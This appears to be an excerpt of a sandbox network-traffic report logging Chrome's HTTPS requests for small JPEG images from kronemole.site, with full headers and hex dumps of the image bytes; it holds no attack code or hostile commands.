                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R9eP75IoRvQ4pd1D1yn1JBCLyQjgmD5KtVgQsolT%2BA1dUkXKXS%2Fdog%2Ffc19r%2FHMQZk1qt1Ytrx%2BXlAxy0O7pwyHkLnujtMAxc5Ld%2Ff7J2nhModPuKhcyeiY01y9nskQrpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa5ef4e5866-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC722INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 1f 43 6f 6d 70 72 65 73 73 65 64 20 62 79 20 6a 70 65 67 2d 72 65 63 6f 6d 70 72 65 73 73 ff db 00 84 00 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c 01 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c ff c2 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 03 01 00 02 03 00 00 00 00 00 00 00 00 00 00 06 07 08 05 03 09 01 02 04 ff da 00 08 01 01 00 00 00 00 f7 3c ca 5c 7c 1b 85 4b aa
                                                                          Data Ascii: JFIFCompressed by jpeg-recompress""*%%*424DD\""*%%*424DD\22"<\|K
                                                                          2023-11-21 16:58:43 UTC722INData Raw: a3 7d 3f e7 2c ec 42 65 7d 09 67 c3 d3 a1 d8 e7 b7 b9 31 aa 23 ec e4 a4 46 60 00 48 c6 de af 49 88 a6 2b c7 db ad 9d 8d 6f b1 9b 86 60 91 32 31 3c d0 fc 18 45 42 9e d4 88 bc 4c ff 00 a7 0c eb 28 73 9c 1d f4 b2 75 d6 5e 08 78 74 77 de 82 ae cb 70 61 30 60 d5 d1 05 c4 69 12 98 75 21 49 2d 29 5a 65 bd b9 31 5d d3 75 87 89 42 d1 4d 45 81 09 3b 1c 11 e7 81 0f 43 5a 69 2f 75 ca d2 67 1b 51 96 4f 05 27 59 2b 38 19 81 b7 91 d1 47 40 8b 9b 40 d6 d5 34 9e 85 3f 26 4c 55 cd 93 14 c8 10 43 03 90 36 e7 89 1e 6b 14 7b 11 98 bb 77 e0 d6 5d b4 34 25 bb cc 6e c6 59 c9 98 ff 00 ea 70 7f e0 03 ce 85 ed 5a f6 6f f9 8c fd c6 f2 ed ee 72 bf 0f ff c4 00 37 10 00 02 01 03 02 03 03 0a 03 09 00 00 00 00 00 00 01 02 03 04 11 12 00 21 05 22 52 13 31 32 10 14 23 41 42 51 62 71 b2 d2
                                                                          Data Ascii: }?,Be}g1#F`HI+o`21<EBL(su^xtwpa0`iu!I-)Ze1]uBME;CZi/ugQO'Y+8G@@4?&LUC6k{w]4%nYpZor7!"R12#ABQbq


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          27192.168.2.462620104.21.62.203443
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC711OUTGET /fim/3079-US/c269e80114f9dc475a93e1d2e924e5f4.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:43 UTC715INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1998
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:43 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:52 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VxIxVzznLR6n6it13AyhpZyAmkWSMwUbQGZzd3ieYcoo0Oz1c%2BjTHU%2B%2BxuqgeXm7x0nsaPwU%2BJgXuD79FWU1jv5LOBtMbKh3p5D81dV%2Fcr38ZPwYVzFQHU5YWItflYsj9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa5cbb4598c-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC716INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:43 UTC717INData Raw: 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 39 45 38 45 39 31 33 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 39 45 38 45 39 31 34 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 39 45 38 45 39 31 31 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 39 45 38 45 39 31 32 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34
                                                                          Data Ascii: mpMM:InstanceID="xmp.iid:59E8E9138B7F11ED84AD94C3C6E804A1" xmpMM:DocumentID="xmp.did:59E8E9148B7F11ED84AD94C3C6E804A1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59E8E9118B7F11ED84AD94C3C6E804A1" stRef:documentID="xmp.did:59E8E9128B7F11ED84AD94C3C6E804
                                                                          2023-11-21 16:58:43 UTC718INData Raw: 2a b6 16 e6 d3 ca bb 83 5e 5a fe aa c9 e4 ff 00 e9 e4 ff 00 b0 74 ed 34 51 58 b1 ea fb 1a 3a 93 f2 ff 00 c5 6e de 7d b4 eb 99 a2 8a e8 60 fa be e6 1f d3 f7 5d 88 c9 f8 67 b3 d9 49 f3 3f b9 8f 5e 5d dd 74 e7 45 14 33 6c 1f cd b8 bf dd de f4 f6 51 45 15 23 41 ff d9
                                                                          Data Ascii: *^Zt4QX:n}`]gI?^]tE3lQE#A


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.449770104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC711OUTGET /fim/3079-US/4472ed6a36bdd245e7f6835e6e29df47.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:43 UTC718INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2003
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:43 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ALg%2FmUuUWlWdwtc939avjkfxlCxdDkEfGmvM9qwTwuEwnpr%2FHBz7FX41cCQKtsgc834Np2jMiS8CkVwSowjJY4SsDJ5y2wl6DuObMtXgtam%2BmYct%2Fvt7mF4fhBtF59XiiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa5d89459ec-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC719INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:43 UTC720INData Raw: 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 43 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 44 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 41 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 42 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34
                                                                          Data Ascii: MM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBBF94F5104
                                                                          2023-11-21 16:58:43 UTC721INData Raw: f3 69 ae ea c6 ea bf 7f 3f 37 3a f3 72 f9 bb e8 a2 9e f8 3c f1 c9 83 36 93 6b a0 f9 3e 17 af 46 c3 ff 00 9b 8f f8 2b cb fc 23 e2 ec a2 8a e8 ea 6d f0 8c 1f d5 5f 75 87 cb f7 af f8 9c bb bb bb 6a 8a 7f ce 3a e8 35 d3 cd 45 15 9e c3 7d 65 4f cc e5 f8 7f 2d 14 51 42 29 ff d9
                                                                          Data Ascii: i?7:r<6k>F+#m_uj:5E}eO-QB)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.449772104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC715OUTGET /fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC730INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1971
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:43 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:49:27 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9v5NozOuS54DE7fNCeCHdCCnJNV5JFLx4fH1R5dt8NFm7Nla5AXNYwA2fO%2Fg3e71F%2FNhMURij0Ce%2FeQd3uIJyuzRFSmYo1IsxPd1xT8HAGhbvEPeduYViPC633z0RTuGeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa7babd3b3e-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC731INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC732INData Raw: 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 30 46 42 36 37 34 39 45 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 46 42 36 37 34 39 46 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 30 46 42 36 37 34 39 43 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 46 42 36 37 34 39 44 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 2f
                                                                          Data Ascii: :InstanceID="xmp.iid:0FB6749E8B7F11EDB0BEAE2D10CE7672" xmpMM:DocumentID="xmp.did:0FB6749F8B7F11EDB0BEAE2D10CE7672"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0FB6749C8B7F11EDB0BEAE2D10CE7672" stRef:documentID="xmp.did:0FB6749D8B7F11EDB0BEAE2D10CE7672"/
                                                                          2023-11-21 16:58:44 UTC733INData Raw: e3 45 15 cb b8 ee 07 41 ed 7d aa 0f bb c2 8a 2a e5 09 27 b7 37 0f c3 1f be 94 fb 9f fe 2c fc 38 3f 1e 14 51 59 33 77 c3 fa f9 34 e2 ed 97 4f 81 0b ed 51 45 15 a4 03 ff d9
                                                                          Data Ascii: EA}*'7,8?QY3w4OQE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.449774172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC724OUTGET /fim/3079-US/bc3bfbb60dc61c1d954c5dd8cb68cfc0.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC733INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2029
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xxa1hFAuNGr7K436qsJKI7vbFW6Fi7cMhQ28QOk%2FKF0dOwmxUyal%2FErIVr413eYLeDaLLRbVKM56hnJIZUjIqW0xBA9HXIZZ6%2FMvq2aN9jQLHezIOimnKlopvghCIbhF%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa89cfb8221-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC734INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC734INData Raw: 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 38 38 32 42 42 39 32 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 38 38 32 42 42 39 33 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 38 38 32 42 42 39 30 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 38 38 32 42 42 39 31 38 42 37 46 31 31 45 44 41 35 39 43 41 39 31 37 32 41 35 33 45 36 43 46
                                                                          Data Ascii: MM:InstanceID="xmp.iid:7882BB928B7F11EDA59CA9172A53E6CF" xmpMM:DocumentID="xmp.did:7882BB938B7F11EDA59CA9172A53E6CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7882BB908B7F11EDA59CA9172A53E6CF" stRef:documentID="xmp.did:7882BB918B7F11EDA59CA9172A53E6CF
                                                                          2023-11-21 16:58:44 UTC736INData Raw: 06 55 66 d6 5f 6c ae b1 28 ec 39 c3 ee 8c fd 5d 14 54 cf 99 73 f0 ff 00 37 f4 d1 4a 47 69 c7 1c eb 35 e7 c6 8a 2a 83 1b ed 9f ec 9f 37 bb e3 7f 8e a8 6e 39 c6 cf c2 ff 00 a7 3e ff 00 e5 fe a5 14 50 fe 55 f2 57 8f f9 df dd 7d 46 76 bf 0d 8f ec ca cb d3 e1 fe af de f2 5a 97 db bc 38 59 77 55 97 f0 d1 45 25 b5 fd 83 8b e3 c9 f8 14 a8 a2 8a 52 27 ff d9
                                                                          Data Ascii: Uf_l(9]Ts7JGi5*7n9>PUW}FvZ8YwUE%R'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.449773172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC724OUTGET /fim/3079-US/5ab79569e48f195b913682012875bbbd.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC727INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2066
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:51:48 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:52 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: HIT
                                                                          Age: 415
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y%2FN8B9%2Bz%2BXJq102bUxnuMftQf1Axep9df9cKjzonN%2B3ZqlQiDF4RDd8dPkUNLety4wVyUqaeLyLygT4uh8G0asuPrb26JUtl7%2BCMRFpWNy5QjODUy72pok3wu2iBmkRM9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa88d0f6faf-IAD
                                                                          alt-svc: h3=":443"; ma=86400
